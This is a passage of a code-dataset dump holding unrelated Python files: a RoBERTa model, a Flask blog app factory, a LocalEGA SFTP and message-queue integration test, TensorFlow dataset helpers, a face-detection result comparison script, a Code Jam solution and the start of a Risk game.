WIQA_Robert(nn.Module):\n\n def __init__(self):\n super(WIQA_Robert, self).__init__()\n self.bert = RobertaModel.from_pretrained('roberta-base')\n self.last_layer_size = self.bert.config.hidden_size\n\n def forward(self, input_ids,attention_mask):\n last_hidden_state, pooled_output = self.bert(input_ids=input_ids,attention_mask=attention_mask,return_dict=False)\n return last_hidden_state[:,0]\n\nclass RobertaClassificationHead(nn.Module):\n\n def __init__(self,last_layer_size):\n super(RobertaClassificationHead, self).__init__()\n self.dense = nn.Linear(last_layer_size, last_layer_size)\n self.dropout = nn.Dropout(0.2)\n self.out_proj = nn.Linear(last_layer_size, 2)\n\n def forward(self, x):\n x = self.dropout(x)\n x = self.dense(x)\n x = torch.tanh(x)\n x = self.dropout(x)\n x = self.out_proj(x)\n return x\n\nclass WIQAModel(PrimalDualModel):\n def __init__(self, graph, poi, loss, metric):\n super().__init__(\n graph,\n poi=poi,\n loss=loss,\n metric=metric)\n","sub_path":"examples/WIQA/WIQA_models.py","file_name":"WIQA_models.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"383421729","text":"import os\n\nfrom sqlalchemy import event\n\nfrom flask import Flask\nfrom flask.ext.login import current_user\nfrom flask.ext.principal import identity_loaded, UserNeed, RoleNeed\n\nfrom .models import db, Reminder, User, Role, Post, Comment, Tag\nfrom .extensions import (\n bcrypt,\n oid,\n login_manager,\n principals,\n rest_api,\n celery,\n debug_toolbar,\n cache,\n assets_env,\n main_js,\n main_css,\n admin,\n mail\n)\nfrom .controllers.main import main_blueprint\nfrom .controllers.blog import blog_blueprint\nfrom .controllers.rest.auth import AuthApi\nfrom .controllers.rest.post import PostApi\nfrom .controllers.admin import (\n CustomView,\n CustomModelView,\n CustomFileAdmin,\n PostView\n)\nfrom .tasks import on_reminder_save\n\n\ndef create_app(object_name):\n \"\"\"\n An flask application factory, as explained here:\n http://flask.pocoo.org/docs/patterns/appfactories/\n\n Arguments:\n object_name: the python path of the config object,\n e.g. project.config.ProdConfig\n \"\"\"\n\n app = Flask(__name__)\n app.config.from_object(object_name)\n\n db.init_app(app)\n event.listen(Reminder, 'after_insert', on_reminder_save)\n\n bcrypt.init_app(app)\n oid.init_app(app)\n login_manager.init_app(app)\n principals.init_app(app)\n celery.init_app(app)\n debug_toolbar.init_app(app)\n cache.init_app(app)\n assets_env.init_app(app)\n admin.init_app(app)\n mail.init_app(app)\n\n assets_env.register(\"main_js\", main_js)\n assets_env.register(\"main_css\", main_css)\n\n admin.add_view(CustomView(name='Custom'))\n admin.add_view(\n CustomModelView(\n User, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Role, db.session, category='Models'\n )\n )\n admin.add_view(\n PostView(\n Post, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Comment, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Tag, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomModelView(\n Reminder, db.session, category='Models'\n )\n )\n admin.add_view(\n CustomFileAdmin(\n os.path.join(os.path.dirname(__file__), 'static'),\n '/static/',\n name='Static Files'\n )\n )\n\n rest_api.add_resource(\n AuthApi,\n '/api/auth'\n )\n rest_api.add_resource(\n PostApi,\n '/api/post',\n '/api/post/'\n )\n rest_api.init_app(app)\n\n @identity_loaded.connect_via(app)\n def on_identity_loaded(sender, identity):\n # Set the identity user object\n identity.user = current_user\n\n # Add the UserNeed to the identity\n if hasattr(current_user, 'id'):\n identity.provides.add(UserNeed(current_user.id))\n\n # Add each role to the identity\n if hasattr(current_user, 'roles'):\n for role in current_user.roles:\n identity.provides.add(RoleNeed(role.name))\n\n app.register_blueprint(main_blueprint)\n app.register_blueprint(blog_blueprint)\n\n return app\n","sub_path":"Chapter 13_Code/Chapter 13/webapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"48751634","text":"import paramiko\nimport os\nimport pika\nimport secrets\nfrom hashlib import md5\nimport json\nimport string\nimport uuid\nimport logging\nfrom legacryptor.crypt4gh import encrypt\nimport pgpy\nimport argparse\nfrom base64 import b64decode\nfrom minio import Minio\nfrom kubernetes import client, config\nfrom kubernetes.client.rest import ApiException\nfrom time import sleep\n\n\nconfig.load_kube_config()\napi_core = client.CoreV1Api()\n\n\nFORMAT = '[%(asctime)s][%(name)s][%(process)d %(processName)s][%(levelname)-8s] (L:%(lineno)s) %(funcName)s: %(message)s'\nlogging.basicConfig(format=FORMAT, datefmt='%Y-%m-%d %H:%M:%S')\nLOG = logging.getLogger(__name__)\nLOG.setLevel(logging.INFO)\n\n\ndef open_ssh_connection(hostname, user, key_path, key_pass='password', port=2222):\n \"\"\"Open an ssh connection, test function.\"\"\"\n try:\n client = paramiko.SSHClient()\n k = paramiko.RSAKey.from_private_key_file(key_path, password=key_pass)\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(hostname, allow_agent=False, look_for_keys=False, port=port, timeout=0.3, username=user, pkey=k)\n LOG.info(f'ssh connected to {hostname}:{port} with {user}')\n except paramiko.BadHostKeyException as e:\n LOG.error(f'Something went wrong {e}')\n raise Exception('BadHostKeyException on ' + hostname)\n except paramiko.AuthenticationException as e:\n LOG.error(f'Something went wrong {e}')\n raise Exception('AuthenticationException on ' + hostname)\n except paramiko.SSHException as e:\n LOG.error(f'Something went wrong {e}')\n raise Exception('SSHException on ' + hostname)\n\n return client\n\n\ndef sftp_upload(hostname, user, file_path, key_path, key_pass='password', port=2222):\n \"\"\"SFTP Client file upload.\"\"\"\n try:\n k = paramiko.RSAKey.from_private_key_file(key_path, password=key_pass)\n transport = paramiko.Transport((hostname, port))\n transport.connect(username=user, pkey=k)\n LOG.info(f'sftp connected to {hostname}:{port} with {user}')\n sftp = paramiko.SFTPClient.from_transport(transport)\n filename, _ = os.path.splitext(file_path)\n sftp.put(file_path, f'{filename}.c4ga')\n LOG.info(f'file uploaded {filename}.c4ga')\n except Exception as e:\n LOG.error(f'Something went wrong {e}')\n raise e\n finally:\n LOG.debug('sftp done')\n transport.close()\n\n\ndef submit_cega(address, message, routing_key, port=5672, file_md5=None):\n \"\"\"Submit message to CEGA along with.\"\"\"\n # Determine credentials\n mq_password = b64decode(read_secret('cega-connection').to_dict()['data']['address']).decode('utf-8')[12:44]\n mq_address = f'amqp://lega:{mq_password}@{address}:{port}/lega'\n try:\n parameters = pika.URLParameters(mq_address)\n connection = pika.BlockingConnection(parameters)\n channel = connection.channel()\n channel.basic_publish(exchange='localega.v1', routing_key=routing_key,\n body=json.dumps(message),\n properties=pika.BasicProperties(correlation_id=str(uuid.uuid4()),\n content_type='application/json',\n delivery_mode=2))\n\n connection.close()\n LOG.info('Message published to CentralEGA')\n except Exception as e:\n LOG.error(f'Something went wrong {e}')\n raise e\n\n\ndef encrypt_file(file_path, pubkey):\n \"\"\"Encrypt file and extract its md5.\"\"\"\n file_size = os.path.getsize(file_path)\n filename, _ = os.path.splitext(file_path)\n output_base = os.path.basename(filename)\n c4ga_md5 = None\n output_file = os.path.expanduser(f'{output_base}.c4ga')\n\n try:\n encrypt(pubkey, open(file_path, 'rb'), file_size, open(f'{output_base}.c4ga', 'wb'))\n with open(output_file, 'rb') as read_file:\n c4ga_md5 = md5(read_file.read()).hexdigest()\n LOG.info(f'File {output_base}.c4ga is the encrypted file with md5: {c4ga_md5}.')\n except Exception as e:\n LOG.error(f'Something went wrong {e}')\n raise e\n return (output_file, c4ga_md5)\n\n\ndef read_secret(name):\n \"\"\"Read secret.\"\"\"\n api_response = ''\n try:\n api_response = api_core.read_namespaced_secret(name, \"testing\", exact=True, export=True)\n LOG.info(f'S3 connection parameters: {name} read.')\n except ApiException as e:\n LOG.error(f'Exception message: {e}')\n else:\n return api_response\n\n\ndef list_s3_objects(minio_address, bucket_name, region_name):\n \"\"\"Check if there is a file inside s3.\"\"\"\n s3_keys = read_secret('s3-keys')\n access = b64decode(s3_keys.to_dict()['data']['access']).decode('utf-8')\n secret = b64decode(s3_keys.to_dict()['data']['secret']).decode('utf-8')\n\n minioClient = Minio(minio_address, access_key=access, secret_key=secret,\n region=region_name, secure=False)\n LOG.info(f'Connected to S3: {minio_address}.')\n # List all object paths in bucket that begin with my-prefixname.\n objects = minioClient.list_objects_v2(bucket_name, recursive=True)\n for obj in objects:\n assert obj.object_name == '1', f\"Wrong file! This is the file you are looking: {obj.object_name.encode('utf-8')}\"\n LOG.info(f'Found ingested file: {obj.object_name} of size: {obj.size}.')\n\n\ndef main():\n \"\"\"Do the sparkles and fireworks.\"\"\"\n parser = argparse.ArgumentParser(description=\"Encrypting, uploading to inbox and sending message to CEGA.\")\n\n parser.add_argument('input', help='Input file to be encrypted.')\n parser.add_argument('--u', help='Username to identify the elixir.', default='ega-box-999')\n parser.add_argument('--uk', help='User secret private RSA key.', default='auto/config/user.key')\n parser.add_argument('--pk', help='Public key file to encrypt file.', default='auto/config/key.1.pub')\n parser.add_argument('--inbox', help='Inbox address, or service name', default='inbox.lega.svc')\n parser.add_argument('--inbox-port', help='Inbox address, or service name', default='inbox.lega.svc')\n parser.add_argument('--s3', help='Inbox address, or service name', default='s3.lega.svc')\n parser.add_argument('--cm', help='CEGA MQ broker IP/name address')\n parser.add_argument('--cm-port', help='Inbox address, or service name')\n\n args = parser.parse_args()\n\n used_file = os.path.expanduser(args.input)\n key_pk = os.path.expanduser(args.uk)\n pub_key, _ = pgpy.PGPKey.from_file(os.path.expanduser(args.pk))\n\n inbox_host = args.inbox\n test_user = args.u\n test_file, c4ga_md5 = encrypt_file(used_file, pub_key)\n stableID = ''.join(secrets.choice(string.digits) for i in range(16))\n fileID = 1 # Harcoded for now\n if c4ga_md5:\n sftp_upload(inbox_host, test_user, test_file, key_pk, port=int(args.inbox_port))\n submit_cega(args.cm, {'user': test_user, 'filepath': test_file}, 'files', port=args.cm_port)\n submit_cega(args.cm, {'file_id': fileID, 'stable_id': f'EGAF{stableID}'}, 'files.stableIDs', port=args.cm_port)\n sleep(10) # wait for the file\n list_s3_objects(args.s3, 'lega', 'lega')\n LOG.info('Should be all!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test/sftp.py","file_name":"sftp.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"306383739","text":"import pandas\r\n\r\ndata = {\r\n \"FirstName\": [\"Satvik\",\"Avinash\",\"Lahri\"] ,\r\n \"LastName\": [\"Shah\",\"Kati\",\"Rath\"],\r\n \"Email\": [\"satshah@example.com\", \"avinashk@example.com\",\"lahri.rath@example.com\"],\r\n \"PhoneNumber\": [4537829158, 5892184058, 4528727830]\r\n}\r\n\r\ntable = pandas.DataFrame(data)\r\ntable.to_excel(\"sameplexls.xlsx\")\r\n\r\n","sub_path":"Python/Activities/Activity19.py","file_name":"Activity19.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"327393269","text":"import numpy as np\n\nfrom lumicks.pylake.fdcurve import FDCurve\nfrom lumicks.pylake.channel import Slice, TimeSeries\n\n\ndef make_mock_fd(force, distance, start=0):\n \"\"\"Mock FD curve which is not attached to an actual file, timestamps start at `start`\"\"\"\n assert len(force) == len(distance)\n fd = FDCurve(file=None, start=None, stop=None, name=\"\")\n timestamps = np.arange(len(force)) + start\n fd._force_cache = Slice(TimeSeries(force, timestamps))\n fd._distance_cache = Slice(TimeSeries(distance, timestamps))\n return fd\n\n\ndef test_subtraction():\n fd1 = make_mock_fd(force=[1, 2, 3], distance=[0, 1, 2], start=0)\n fd2 = make_mock_fd(force=[2, 2, 2], distance=[0, 1, 2], start=100)\n assert np.allclose((fd1 - fd2).f.data, [-1, 0, 1])\n assert np.allclose((fd2 - fd1).f.data, [1, 0, -1])\n\n fd1 = make_mock_fd(force=[1, 2, 3], distance=[0, 1, 2], start=0)\n fd2 = make_mock_fd(force=[2, 2, 2], distance=[1, 2, 3], start=100)\n assert np.allclose((fd1 - fd2).f.data, [0, 1])\n assert np.allclose((fd2 - fd1).f.data, [0, -1])\n\n fd1 = make_mock_fd(force=[1, 2, 3], distance=[0, 1, 2], start=0)\n fd2 = make_mock_fd(force=[1, 1, 1], distance=[5, 6, 7], start=100)\n assert np.allclose((fd1 - fd2).f.data, [])\n assert np.allclose((fd2 - fd1).f.data, [])\n","sub_path":"04 C-Trap Automation PYTHON/blue-lake_scripting/advanced/lumicks/pylake/tests/test_dfcurve.py","file_name":"test_dfcurve.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"102984726","text":"import xlsxwriter\r\nimport csv\r\nfrom picCheck.updateFtp import *\r\nimport os\r\n\r\ndef getresult(excelFileAera,endstr,startstr):#读取Excel中的数据\r\n csv_reader = csv.reader(open(excelFileAera))\r\n results = []\r\n start = False\r\n for i in csv_reader:\r\n if i[0] == endstr :#数据读取截止位置\r\n break\r\n if i[0] == startstr: #数据读取开始位置\r\n start = True\r\n continue\r\n if start:\r\n results.append(i)\r\n return results\r\n\r\nstandardResult = getresult(STANDAR_EXCEL,'程序结束时间','文件名')\r\ncheckResult = getresult(CHECK_EXCEL,'程序结束时间','文件名')\r\n\r\ndef acreage(x1,y1,x3,y3):\r\n return abs(x1-x3) * abs(y1-y3)\r\ndef centrality(x1,y1,x2,y2):\r\n c = [x1,x2]\r\n c.sort()\r\n d = [y1,y2]\r\n d.sort()\r\n centralityRx = c[0]+(c[1]-c[0])/2\r\n centralityRy = d[0]+(d[1]-d[0])/2\r\n return centralityRx,centralityRy\r\n# def stance(checkName,x1,y1,x3,y3,x0,y0,x4,y4):\r\n# rx,ry = centrality(x1,y1,x3,y3)\r\n# rx0,ry0 = centrality(x0,y0,x4,y4)\r\n# if rx == rx0 and ry == ry0:\r\n# return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n# if rx == rx0 and abs(ry-ry0) <= 0.1*abs(y3-y1):\r\n# return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n# if ry == ry0 and abs(rx-rx0) <= 0.1*abs(x3-x1):\r\n# return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n# if rx != rx0 and ry != ry0:\r\n# centrAcreageR = acreage(rx,ry,rx0,ry0)\r\n# acreageR = acreage(x1,y1,x3,y3)\r\n#\r\n# if centrAcreageR <=0.1*acreageR:\r\n# return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n# else:\r\n# return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n# elif rx == rx0 and abs(ry-ry0) > 0.1*abs(y3-y1):\r\n# return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n# elif ry == ry0 and abs(rx-rx0) > 0.1*abs(x3-x1):\r\n# return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n#新算法\r\ndef stance(checkName,x1,y1,x3,y3,x0,y0,x4,y4):\r\n if x1 == y1 == x3==y3 == 0 and x0 == y0 == x4 == y4 == 0:\r\n return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n # else:\r\n # return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n newX1 = max(x1,x0)\r\n newY1 = max(y1,y0)\r\n newX2 = min(x1+abs(x3-x1),x0+abs(x0-x4))\r\n newY2 = min(y1+abs(y1-y3),y0+abs(y0-y4))\r\n print(newX2,newX1,newY2,newY1)\r\n AJoin = 0\r\n if newX2>newX1 and newY2 > newY1 :\r\n AJoin = (newX2-newX1)*(newY2 - newY1)\r\n A1 = abs(x3-x1) * abs(y1-y3)\r\n A2 = abs(x0-x4) * abs(y0-y4)\r\n AUnion = A1+A2-AJoin\r\n if AUnion > 0 or AUnion == 0 :\r\n if AJoin/A1 > 0.9 or AJoin/A1 == 0.9 :\r\n return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n else:\r\n return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n else:\r\n return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n else:\r\n return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n # print('AJoin',AJoin)\r\n\r\ndef checkFaceNum(results):\r\n newResult = []\r\n for result in results:\r\n newResult.append(result[0])\r\n dic ={}\r\n for item in newResult:\r\n if item in dic.keys():\r\n dic[item]+=1\r\n else:\r\n dic[item]=1\r\n return dic\r\n\r\ndef checkMain():\r\n results1 = []\r\n results2 = []\r\n results3 = []\r\n results4 = []\r\n wrongResult = []\r\n standardDic = checkFaceNum(standardResult)\r\n checkDic = checkFaceNum(checkResult)\r\n\r\n for i in checkDic :\r\n for j in standardDic:\r\n if j in checkDic:\r\n if i == j:\r\n if checkDic[i] == standardDic[j]:\r\n print(i, standardDic[i], \":the same\")\r\n elif checkDic[i] < standardDic[j]:\r\n # for j in checkResult:\r\n # if i == j[0]:\r\n res1 = [j,'比对表,标准表数量少'+str(standardDic[j] - checkDic[i] )]\r\n results3.append(res1)\r\n elif checkDic[i] > standardDic[j]:\r\n # for j in checkResult:\r\n # if i == j[0]:\r\n res1 = [j,'标准表,比对表数量少'+str(checkDic[i] - standardDic[j])]\r\n results3.append(res1)\r\n else:\r\n break\r\n for j1 in standardDic:\r\n if j1 not in checkDic:\r\n # for j in standardResult:\r\n # if j1 == j[0]:\r\n res1 = [j1,'在标准表存在'+j1+'数量:'+str(standardDic[j1])+'在比对表中不存在']\r\n results3.append(res1)\r\n\r\n\r\n # dif = set(checkDic.items())^set(standardDic.items())\r\n # print('dif:',list(dif))\r\n # for result1111 in checkResult:\r\n # if '/tmp/banchun/pic/dahua/000308600.jpg' == result1111[0]:\r\n # # print(result[0],key[0])\r\n # print('1111:',result1111)\r\n # i = 4\r\n # for i in range(4):\r\n # resyRrry = []\r\n # for result in checkResult:\r\n # for key in dif:\r\n # key1 = key[0]\r\n # break\r\n #\r\n # print('key1',key1)\r\n # for i in range(len(checkResult)):\r\n # for key in dif:\r\n # for result in checkResult:\r\n # if result[0] == key[0]:\r\n # print(result[0],key[0])\r\n # print(result)\r\n # try:\r\n # checkResult.remove(result)\r\n # except Exception as e :\r\n # pass\r\n # import time\r\n # time.sleep(1)\r\n # i=i-1\r\n print('11112:',checkResult)\r\n for i in standardResult:\r\n for j in checkResult:\r\n if i[0] == j[0]:\r\n print(i[0])\r\n picName,coordinate,res = stance(i[0],int(i[1]),int(i[2]),int(i[3]),int(i[4]),int(j[1]),int(j[2]),int(j[3]),int(j[4]))\r\n if res == '正确匹配':\r\n results1.append([picName,coordinate,res])\r\n else:\r\n results2.append([picName,coordinate,res])\r\n for i in results1:\r\n for j in results2:\r\n if i[0] == j[0] and i[1] == j[1]:\r\n results2.remove(j)\r\n # a= []\r\n results2 = list(set([tuple(x) for x in results2]))\r\n for i in results2:\r\n i = list(i)\r\n wrongResult.append(i)\r\n print(results1)\r\n print(wrongResult)\r\n print(results3)\r\n print(len(results1))\r\n print(len(wrongResult))\r\n print(len(results3))\r\n wrong1 = len(wrongResult)/len(standardResult)*100\r\n wrong2 = len(wrongResult)/len(checkResult)*100\r\n true = len(results1)/len(standardResult)*100\r\n true1 = len(results1)/len(checkResult)*100\r\n leave = len(results3)/len(standardResult)*100\r\n leave1 = len(results3)/len(checkResult)*100\r\n results4 = results1+wrongResult\r\n return results4,results3,[['正确/标准表:',str('%.2f'%true)+'%'],['正确/比对表:',str('%.2f'%true1)+'%'],['漏测/标准表:',str('%.2f'%leave)],['漏测/比对表:',str('%.2f'%leave1)],['误测/标准表:',str('%.2f'%wrong1)+'%'],['误测/比对表:',str('%.2f'%wrong2)]],wrongResult\r\ndef write_result(workbook, sheet, results_prcessed, result_title, format_title, fromat_content):\r\n ncols = len(result_title) # 总列数\r\n nrows = len(results_prcessed)+1 #总行数,多加一列标题\r\n for row in range(nrows):\r\n for col in range(ncols):\r\n if row == 0:\r\n sheet.write(row, col, result_title[col], format_title) # 写标题\r\n elif col == 0:\r\n sheet.write(row, col, row, fromat_content) #写序号\r\n else:\r\n sheet.write(row, col, results_prcessed[row-1][col-1], fromat_content)\r\n\r\ndef write_excel():\r\n results,results1,results2,wrongResult = checkMain()\r\n if os.path.exists(OUTEXCEL):\r\n print ('输出文件已存在!')\r\n return\r\n else:\r\n workbook = xlsxwriter.Workbook(OUTEXCEL)\r\n sheet1 = workbook.add_worksheet('结果详情')\r\n sheet2 = workbook.add_worksheet('漏测详情')\r\n sheet3 = workbook.add_worksheet('概率统计')\r\n result_title = ['序号','图片地址','人脸坐标','比对结果'] #标题\r\n result_title1 = ['序号','图片地址','比对结果'] #标题\r\n result_title2 = ['序号','描述','所有概率'] #标题\r\n format_title = workbook.add_format({'bold': True, 'bg_color': 'yellow', 'border': True}) #标题格式\r\n fromat_content = workbook.add_format({'border': True}) #内容格式\r\n write_result(workbook, sheet1, results, result_title, format_title,0)\r\n write_result(workbook, sheet2, results1, result_title1, format_title,0)\r\n write_result(workbook, sheet3, results2, result_title2, format_title,0)\r\n import time\r\n time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\r\n os.mkdir('statistics/'+time)\r\n os.mkdir('statistics/'+time+'/leavingOut')\r\n os.mkdir('statistics/'+time+'/wrongeOut')\r\n for pname in wrongResult:\r\n print('pname',pname)\r\n pname1 = pname[0].split('/')\r\n pname1 = pname1[len(pname1)-1]\r\n sftp_down_file(pname[0],'statistics/'+time+'/wrongeOut/'+pname1)\r\n for pname in results1:\r\n print('pname',pname)\r\n pname1 = pname[0].split('/')\r\n pname1 = pname1[len(pname1)-1]\r\n sftp_down_file(pname[0],'statistics/'+time+'/leavingOut/'+pname1)\r\n ftp = updateFtp(HOSTIP)\r\n ftp.Login(LOGINNAME,LOGINPWD)\r\n\r\n\r\n ftp.UpLoadFileTree('statistics', REMOTEDIR )\r\n ftp.close()\r\n print(\"ok!\")\r\n\r\nwrite_excel()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"picCheck/readExcel.py","file_name":"readExcel.py","file_ext":"py","file_size_in_byte":9698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"537327614","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Contains utilities for downloading and converting datasets.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport pickle\nimport os\n\n\ndef save_obj(obj, save_dir, name):\n with open(os.path.join(save_dir, name + '.pkl'), 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name, file_dir):\n with open(os.path.join(file_dir, name + '.pkl'), 'rb') as f:\n return pickle.load(f)\n\n\ndef int64_feature(values):\n \"\"\"Returns a TF-Feature of int64s.\n Args:\n values: A scalar or list of values.\n Returns:\n a TF-Feature.\n \"\"\"\n if not isinstance(values, (tuple, list)):\n values = [values]\n\n return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n\ndef floats_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef bytes_feature(values):\n \"\"\"Returns a TF-Feature of bytes.\n Args:\n values: A string.\n Returns:\n a TF-Feature.\n \"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[values]))\n\n\ndef to_tfexample(image_data, image_format, im_size, bbox, azimuth, elevation, theta):\n return tf.train.Example(features=tf.train.Features(feature={\n 'image/encoded': bytes_feature(image_data),\n 'image/format': bytes_feature(image_format),\n 'image/height': int64_feature(im_size[0]),\n 'image/width': int64_feature(im_size[1]),\n 'image/bbox': floats_feature(bbox),\n 'image/viewpoint': floats_feature([azimuth, elevation, theta]),\n }))\n\n\ndef image_to_tfexample(image_data, image_format, height, width, class_id):\n return tf.train.Example(features=tf.train.Features(feature={\n 'image/encoded': bytes_feature(image_data),\n 'image/format': bytes_feature(image_format),\n 'image/class/label': int64_feature(class_id),\n 'image/height': int64_feature(height),\n 'image/width': int64_feature(width),\n }))\n\n\nclass ImageCoder(object):\n \"\"\"Helper class that provides TensorFlow image coding utilities.\"\"\"\n\n def __init__(self):\n # Create a single Session to run all image coding calls.\n self._sess = tf.Session()\n\n # Initializes function that converts PNG to JPEG data.\n self._png_data = tf.placeholder(dtype=tf.string)\n image = tf.image.decode_png(self._png_data, channels=3)\n self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)\n\n # Initializes function that converts CMYK JPEG data to RGB JPEG data.\n self._cmyk_data = tf.placeholder(dtype=tf.string)\n image = tf.image.decode_jpeg(self._cmyk_data, channels=0)\n self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)\n\n # Initializes function that decodes RGB JPEG data.\n self._decode_jpeg_data = tf.placeholder(dtype=tf.string)\n self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)\n\n # Initializes function that encodes RGB JPEG data.\n self._encode_image_data = tf.placeholder(dtype=tf.uint8)\n self._encode_jpeg = tf.image.encode_jpeg(self._encode_image_data)\n\n def png_to_jpeg(self, image_data):\n return self._sess.run(self._png_to_jpeg,\n feed_dict={self._png_data: image_data})\n\n def cmyk_to_rgb(self, image_data):\n return self._sess.run(self._cmyk_to_rgb,\n feed_dict={self._cmyk_data: image_data})\n\n def decode_jpeg(self, image_data):\n image = self._sess.run(self._decode_jpeg,\n feed_dict={self._decode_jpeg_data: image_data})\n assert len(image.shape) == 3\n assert image.shape[2] == 3\n return image\n\n def encode_jpeg(self, image_data):\n image_data = image_data.astype(dtype=np.uint8)\n image = self._sess.run(self._encode_jpeg,\n feed_dict={self._encode_image_data: image_data})\n return image\n","sub_path":"datasets/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"289716743","text":"TEST_NAME = 'B-large'\n\ndef main():\n\tsolutions = []\n\twith open(TEST_NAME+'.in', 'r') as f:\n\t\trows = int(f.readline())\n\t\tfor i in range(rows):\n\t\t\tall_heights = [0 for i in range(2501)]\n\t\t\tN = int(f.readline().strip())\n\t\t\t\n\t\t\tfor j in range(2*N-1):\n\t\t\t\trow = (map(int, f.readline().strip().split(' ')))\n\t\t\t\tfor number in row:\n\t\t\t\t\tall_heights[number] += 1\n\n\t\t\tsolution = get_odd_heights(all_heights)\n\t\t\t\n\t\t\tsolutions.append(' '.join((map(str, solution))))\n\t\n\twith open(TEST_NAME+'.out', 'w') as f:\n\t\tcounter = 1\n\t\tfor line in solutions:\n\t\t\tf.write(\"Case #{0}: {1}\\n\".format(str(counter), line))\n\t\t\tcounter += 1\n\ndef get_odd_heights(all_heights):\n\tres = []\n\tcounter = 0\n\tfor i in all_heights:\n\t\tif i % 2 != 0:\n\t\t\tres = insert_sorted(counter, res)\n\t\tcounter += 1\n\treturn res\n\t\ndef insert_sorted(x, niz):\n\tres = []\n\tcounter = 0\n\tfor i in niz:\n\t\tif i < x:\n\t\t\tcounter += 1\n\t\telse:\n\t\t\tbreak\n\tres = niz[:counter] + [x] + niz[counter:]\n\treturn res\n\nmain()\n\n","sub_path":"codes/BuildLinks1.10/test_input/CJ/16_1_2_crollywood_main.py","file_name":"16_1_2_crollywood_main.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"636328264","text":"from flask import Blueprint, render_template, request, redirect\n\nbp = Blueprint(__name__, __name__, template_folder='templates')\n\n\ndef productInfo():\n with open('frontEnd/notes/productInfoJson.json', 'r') as _file:\n jsonData = json.loads(_file.read())\n jsonData[\"GTX 1080TiDUKE11G OC\"]\n\n _file.close()\n return product\n\n\n\n@bp.route('/product', methods=['POST', 'GET'])\ndef show():\n return render_template('product.html', notes=productInfo)","sub_path":"src/main/python/frontEnd/views/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"508328615","text":"#!/usr/bin/env python2\n# std\nimport argparse\nimport sys\n# user\nimport risk\nimport risk.logger\nimport risk.game_master\nfrom risk import board\nfrom risk.game_master import GameMaster\n\n# exit codes\n_EXIT_BAD_ARGS = -1\n\n###############################################################################\n## CLI option parsing\n#\ndef app_setup():\n parser = argparse.ArgumentParser(description='Risk game with Python')\n # dev build defaults to debug for now\n parser.add_argument('--verbose', '-v', action='count',\n help='extra output', default=risk.logger.LEVEL_DEBUG)\n settings = parser.parse_args()\n risk.logger.LOG_LEVEL = settings.verbose\n return settings\n\n\n###############################################################################\n## Debug functions\n#\ndef end_turn_debug_print(game_master):\n risk.logger.debug('Ending turn...')\n\n###############################################################################\n## Main game functions\n#\ndef game_setup(settings):\n _DEV_HUMAN_PLAYERS = 6\n game_board = board.generate_empty_board()\n game_master = risk.game_master.GameMaster(game_board, settings)\n game_master.generate_human_players(_DEV_HUMAN_PLAYERS)\n game_master.add_end_turn_callback(end_turn_debug_print)\n return game_master\n\ndef run_game(game_master):\n risk.logger.debug('Starting risk game...')\n 